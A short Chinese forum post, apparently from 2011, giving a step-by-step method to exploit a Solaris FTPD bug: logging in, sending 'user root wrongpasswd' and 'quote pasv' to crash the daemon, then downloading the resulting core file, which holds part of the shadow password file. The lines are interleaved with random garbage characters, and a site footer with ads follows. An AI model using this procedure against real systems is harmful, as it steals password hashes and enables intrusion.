该方法利用了Solaris 操作系统中FTPD的一个BUG,使得用户可以获得该机的口令文件。具体过程如下:
+ S( W5 t5 L. a* }. l; ^5 j1 S2 H8 E& K% h* }
1.通过 ftp 正常登录到目的主机上% T& n' O$ ~% } y
+ v( V2 D3 L( m1 ~9 B% k2.输入如下命令序列:
/ d- ]7 I' H4 x. ]* F1 q) F. \) v/ U- b1 `( [5 n9 c
ftp> user root wrongpasswd
: v9 Y! b* @( ]9 T( j; ^4 L; z
+ O4 U1 T6 H$ Yftp> quote pasv1 k) }5 ]- P# j5 ~8 x
: |7 \: I" X9 f% T3.这时,ftpd会报错退出,同时会在当前目录下生成一个core,口令文件就包含在这个core中。! R! L4 v0 m& r
* Q3 ]5 p/ t* v! h
4.再次进入FTP >get core% g$ Z2 K$ N m1 D* [
4 ~( j* t" ]/ ]. h" s' A3 [
补充:虽然在core只有一部分shadow,但是对于系统来说已经是致命的打击了, W8 _, M2 A! \0 }" W/ F
- J I, Q1 d/ k. }0 t# f' _
|
|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港
( 鲁ICP备19052200号-1 )
发表于 2011-1-12 21:01:38
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡